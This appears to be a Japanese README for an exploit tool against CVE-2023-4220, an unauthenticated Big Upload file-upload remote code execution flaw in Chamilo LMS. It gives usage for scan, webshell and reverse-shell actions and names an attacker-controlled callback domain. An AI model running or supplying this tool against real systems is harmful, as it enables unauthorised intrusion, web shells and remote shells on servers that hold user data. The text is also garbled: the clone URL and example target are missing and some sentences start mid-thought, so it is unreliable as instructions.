##
# Chamilo LMS 認証不要の Big Upload ファイル RCE PoC
このスクリプトは、**CVE-2023-4220** で説明されている **Chamilo's LMS** ソフトウェアのセキュリティ上の欠陥を悪用するものです。このシステムは、バージョン **1.11.24** 以前で脆弱です。
リポジトリをマシンにクローンし、**pip** を使用して依存関係をインストールします(**virtualenv** を使用して、これらのインストールをグローバルインストールから分離する環境を作成することを推奨します)。
git clone
cd chamilo-lms-unauthenticated-big-upload-rce-poc
このスクリプトは、**Chamilo's** のルートパス(例:** **ターゲット URL** と、実行するアクション(**scan** 、**webshell** 、**revshell** の3つが利用可能)が必要です。
このアクションは、エンドポイント **/main/inc/lib/javascript/bigupload/files/** にアクセスして、ターゲットが脆弱かどうかをチェックします。
python3 main.py -u -a scan
でも、登録したドメイン(例:**evil-vps.domainreg.net** )でも構いません。
python3 main.py -u -a revshell
 Chamilo LMS 認証不要 Big Upload ファイルリモートコード実行